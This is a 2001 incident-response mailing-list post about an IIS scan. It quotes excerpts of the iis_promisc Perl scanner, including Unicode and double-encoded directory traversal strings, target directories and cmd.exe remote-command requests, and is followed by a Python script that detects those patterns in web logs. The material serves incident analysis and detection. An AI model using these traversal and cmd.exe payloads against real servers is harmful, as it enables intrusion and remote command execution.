Re: iis scanning

From: Jordan K Wiens (jwiensat_private)
Date: Mon Jul 02 2001 - 12:24:15 PDT


    Since the SecurityFocus page doesn't actually list the source, I'll quote
    the relevant parts below.
    
    For those of you who are curious (I was), someone found me the translation
    of MinhaNossaSenhoraDoPerpetuoSocorro.  It means Our Lady of Perpetual
    Help, referring to Mary.  Interesting invocation to hack under.
    
    -- 
    Jordan Wiens
    UF Network Incident Response Team
    (352)392-2061
    
    On Mon, 2 Jul 2001, Jordan K Wiens wrote:
    
    > Anyone seen an iis scan that attempts to access boo.bat among other
    > requests along with directory traversal attempts?  I found the source of
    > the script on the web but no mention is made of what boo.bat is included
    > for.  Anyone know what this is?
    > 
    > http://www.securityfocus.com/tools/2060
    > 
    > 
    
    
    
    
    -----------IIS_PROMISC EXCERPTS----------------
    #!/usr/bin/perl
    #
    # iis_promisc v2.0
    #
    # This is a perl script to test the infamous
    # Microsoft IIS holes:
    #
    # -*- Escaped Characters Decoding Bug
    # -*- Unicode Directory Transversal Bug
    #
    # * Support Proxy Server
    # * Over 20 tests will be made ( if found display the patch URL too :)
    #
    # Added to v2:
    #
    # -*- Executable File Parsing Bug check
    # -*- Over 40 bugs tested! 
    #
    # * REQUIRE LWP(Lib WWW for Perl) http://www.linpro.no/lwp/ 
    #   The package libwww is found in many linux distributions
    #
    # by inodeat_private
    # greetz to #unsekure @ irc.brasnet.org
    # http://unsekure.com.br
    #
    # 05/2001
    
    .
    . [SNIP]
    .
    
    $test_command = "winnt/system32/cmd.exe?/c+echo+MinhaNossaSenhoraDoPerpetuoSocorro";
    $dir_command = "winnt/system32/cmd.exe?/c+dir";
    $iis = "1";
    
    my @dir=(
    
    # You can add more exec dirs here
    #"/somedir/",
    
    "/", ## wwwroot
    "/scripts/",
    "/msadc/",
    "/cgi-bin/",
    "/bin/",
    "/samples/",
    "/_vti_cnf/",
    "/_vti_bin/",
    "/adsamples/",
    "/iisadmpwd/",
    "/Rpc/",
    "/PBServer/");
    
    my @string=(
    
    "..%255c..%255c..%255c..%255c..%255c..%255c",
    "..%c0%af../..%c0%af../..%c0%af../",
    "..%e0%80%af../..%e0%80%af../..%e0%80%af../",
    "boo.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C");
    
    .
    . [SNIP]
    .
    
    And the rest is pretty straightforward.  Nothing too tricky.
    
    
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
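
One way to recognise this scan in web or proxy logs, added here as an example and not part of the original post or of iis_promisc: it matches the encodings from the quoted `@string` list and the echo marker from `$test_command`, then groups the hits by client. The log layout (`<client-ip> <method> <raw-uri> <status>`), the assumption that the log records the raw, undecoded request URI, the function and signature names, and the sample lines are all constructed for illustration.

```python
import re
from collections import defaultdict

# Encodings from the @string list in the excerpt; names are this example's own.
SIGNATURES = {
    "double_encoded_backslash": re.compile(r"\.\.%255c", re.I),
    "overlong_slash_2byte": re.compile(r"\.\.%c0%af", re.I),
    "overlong_slash_3byte": re.compile(r"\.\.%e0%80%af", re.I),
    "boo_bat_overlong_backslash": re.compile(r"boo\.bat/\.\.%c1%9c", re.I),
}
CMD = re.compile(r"cmd\.exe\?/c\+", re.I)
MARKER = "minhanossasenhoradoperpetuosocorro"  # echoed by $test_command

def classify(uri):
    """Return the names of the signatures found in one raw request URI."""
    hits = {name for name, rx in SIGNATURES.items() if rx.search(uri)}
    if CMD.search(uri):
        hits.add("cmd_exe")
    if MARKER in uri.lower():
        hits.add("echo_marker")
    return hits

def summarize(lines):
    """Group hits by client. Assumed layout: '<client-ip> <method> <raw-uri> <status>'."""
    clients = defaultdict(lambda: {"hits": set(), "answered_200": []})
    for line in lines:
        ip, _method, uri, status = line.split()
        hits = classify(uri)
        if hits:
            clients[ip]["hits"] |= hits
            # A 200 on a cmd.exe request suggests it was served: check that host.
            if status == "200" and "cmd_exe" in hits:
                clients[ip]["answered_200"].append(uri)
    return dict(clients)

def looks_like_iis_promisc(hits):
    """True for the echo marker, or the boo.bat probe alongside another encoding."""
    encodings = hits & set(SIGNATURES)
    return "echo_marker" in hits or (
        "boo_bat_overlong_backslash" in hits and len(encodings) >= 2)

# Constructed sample lines (documentation addresses, traversal runs shortened).
SAMPLE = [
    "192.0.2.10 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+echo+MinhaNossaSenhoraDoPerpetuoSocorro 404",
    "192.0.2.10 GET /msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir 404",
    "192.0.2.10 GET /scripts/boo.bat/..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir 200",
    "198.51.100.7 GET /downloads/boo.bat 404",
    "198.51.100.7 GET /index.html 200",
]
```

A request for `boo.bat` with no traversal sequence after it is deliberately not flagged, so the per-client combination of encodings is what ties a source to this script.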
    


